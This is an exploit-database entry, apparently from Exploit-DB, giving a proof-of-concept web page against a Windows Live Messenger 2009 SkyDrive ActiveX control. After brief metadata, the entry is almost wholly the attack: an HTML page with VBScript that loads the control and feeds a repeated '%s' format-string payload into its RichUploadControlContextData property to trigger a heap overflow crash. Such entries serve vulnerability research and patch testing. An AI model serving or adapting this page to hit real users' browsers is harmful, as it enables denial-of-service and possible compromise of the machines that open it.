EXPLOITS

Microsoft Windows Live Messenger 2009 - ActiveX Heap Overflow (PoC)

Author: SarBoT511
type: dos
platform: windows
port: 
date_added: 2010-01-20  
date_updated:   
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 11214.html  

#Aouther : [SarBoT511] (xs3@hotmail.com)
#Exploits title :[Windows Live Messenger 2009 ActiveX Heap Overflow PoC]
#tested on :[windows 7 & Vista & Xp sp3]
#Windows Live Messenger SkyDrive 2009

<html>
<object classid='clsid:C2828995-4A83-4100-A212-3024BA117356' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Live SkyDrive\Microsoft.Live.Folders.RichUpload.3.dll"
prototype  = "Property Let RichUploadControlContextData As String"
memberName = "RichUploadControlContextData"
progid     = "RichUploadLib.UploadControl"
argCount   = 1

arg1="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"

target.RichUploadControlContextData = arg1

</script>